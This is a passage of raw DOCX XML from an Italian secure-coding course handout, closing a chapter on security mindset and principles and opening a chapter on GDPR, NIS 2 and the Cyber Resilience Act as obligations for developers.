        <w:t xml:space="preserve">, l’editor gratuito di Microsoft, multipiattaforma (Windows, macOS, Linux). Le estensioni necessarie e le impostazioni consigliate sono nell’</w:t>
      </w:r>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il laboratorio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per gli esercizi pratici useremo un’unica applicazione di esempio scritta in Python/Flask, che si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È una finta banca online minimalista: pagina di login, conto, fatture, gestione del profilo utente. La useremo capitolo dopo capitolo: prima la versione vulnerabile (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), su cui imparerai a lanciare gli attacchi, poi la versione corretta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), che mostra come dovrebbe essere scritta. Le istruzioni di installazione e avvio sono nell’</w:t>
      </w:r>
      <w:hyperlink w:anchor="appendix" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Appendice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="riepilogo-del-capitolo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="sec_1_6"/>
      <w:r>
        <w:t xml:space="preserve">1.6 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza informatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">protegge l’infrastruttura (rete, sistemi, dispositivi); la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza del codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">protegge la logica delle applicazioni. Sono complementari, non alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">compilatore (o l’interprete) non ragiona come un attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la responsabilità di prevedere abusi e usi ostili è di chi scrive il codice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I bug di sicurezza causano danni reali: TalkTalk, Equifax, British Airways, eBay, GitHub sono solo cinque casi documentati su centinaia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mentalità avversaria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">consiste nel chiedersi sistematicamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come si rompe?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oltre che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come funziona?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinque principi attraversano tutto il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">secure coding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">minimo privilegio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">difesa in profondità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fail secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">semplicità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">separazione dei compiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Le leggi che ti riguardano.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vediamo perché GDPR, NIS 2 e Cyber Resilience Act non sono materia da legali: sono requisiti tecnici travestiti da norme.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="105" w:name="capitolo-2-le-leggi-che-ti-riguardano"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="ch_2"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 2 — Le leggi che ti riguardano</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="85" w:name="Xa0f71378f7278ca2cfdca29cbba9be235de44af"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="sec_2_1"/>
      <w:r>
        <w:t xml:space="preserve">2.1 Perché un capitolo di leggi in un corso di programmazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una dispensa tecnica che dedica un intero capitolo a leggi e regolamenti sembra fuori posto. Non lo è, e ci sono tre motivi precisi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Primo: la legge ti impone tecnicismi precisi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando un regolamento europeo scrive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">il titolare adotta misure tecniche adeguate, fra cui la cifratura dei dati personali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non sta esprimendo un’opinione: sta imponendo un obbligo. Lo sviluppatore che memorizza le password dei clienti in chiaro, o che le hasha con MD5,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non sta facendo una scelta tecnica discutibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— sta violando la legge. Le scelte di programmazione che impari nei capitoli successivi non sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">buone pratiche consigliate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sono in molti casi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requisiti normativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">travestiti da tecnicismi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Secondo: le sanzioni sono enormi e non colpiscono solo l’azienda.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le multe del GDPR arrivano a venti milioni di euro o al 4% del fatturato globale annuo, scegliendo la cifra più alta. Per Amazon, una sanzione del 4% del fatturato 2024 sarebbe oltre venti miliardi di euro. Ma c’è di più: la direttiva NIS 2 prevede in alcuni casi la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">responsabilità personale degli organi di amministrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, fino all’interdizione temporanea dalle funzioni dirigenziali. Se l’azienda è piccola e il responsabile della sicurezza coincide con lo sviluppatore senior, quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">responsabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sei tu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terzo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non lo sapevo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è una difesa giuridica.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ignorare la norma non è ignorare la norma: per la legge è una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">colpa aggravante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo sviluppatore professionista è tenuto a conoscere l’impianto normativo del proprio settore così come un avvocato è tenuto a conoscere il codice civile e un medico la farmacopea.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Titolare del trattamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">data controller</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) = la persona o l’organizzazione che decide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trattare dati personali. Per un’azienda che gestisce un sito di e-commerce, il titolare è di norma l’azienda stessa. Lo sviluppatore non è il titolare, ma scrive il codice attraverso cui il titolare adempie agli obblighi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo capitolo vediamo i tre testi normativi che riguardano direttamente chi scrive software in Europa: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in vigore dal 2018), la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">direttiva NIS 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(recepita in Italia nel 2024) e il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Resilience Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(i cui obblighi più rilevanti scattano nel 2027). La traiettoria europea è chiara: ogni anno che passa, la sicurezza del software è meno una scelta professionale e più un obbligo di legge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="92" w:name="Xd9c6f8779b498c73ddcca46f46aae39270015b8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="sec_2_2"/>
      <w:r>
        <w:t xml:space="preserve">2.2 GDPR — Regolamento Generale sulla Protezione dei Dati</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:bookmarkStart w:id="86" w:name="cosè-e-quando-si-applica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è e quando si applica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Regolamento UE 2016/679, in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">General Data Protection Regulation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è il quadro normativo europeo sulla protezione dei dati personali. È in vigore dal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">25 maggio 2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in tutta l’Unione Europea, senza bisogno di leggi nazionali di recepimento (un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">regolamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">europeo si applica direttamente, a differenza di una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">direttiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Differenza fra regolamento e direttiva (UE).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">regolamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">europeo è una legge che si applica così com’è in tutti gli Stati membri, dal giorno in cui entra in vigore. Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">direttiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fissa obiettivi che ogni Stato deve raggiungere, ma lascia ai singoli paesi il modo in cui adattare le proprie leggi interne. Per questo il GDPR è uguale dappertutto in Europa, mentre la NIS 2 (di cui parleremo dopo) è stata recepita in Italia con un decreto legislativo specifico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’aspetto più importante per uno sviluppatore: il GDPR si applica a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiunque tratta dati personali di residenti nell’Unione Europea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, indipendentemente da dove si trovi il server o l’azienda. Un’applicazione web ospitata su un server in California, gestita da una società giapponese, ma che ha utenti italiani, deve rispettare il GDPR per quegli utenti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="cosa-è-un-dato-personale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dato personale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il GDPR definisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dato personale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">qualsiasi informazione riguardante una persona fisica identificata o identificabile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La definizione è volutamente molto ampia. Sono dati personali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nome, cognome, indirizzo, email, numero di telefono</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">indirizzo IP del visitatore di un sito (sì, anche quello)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">identificatori di sessione, identificatori pubblicitari, identificatori del dispositivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
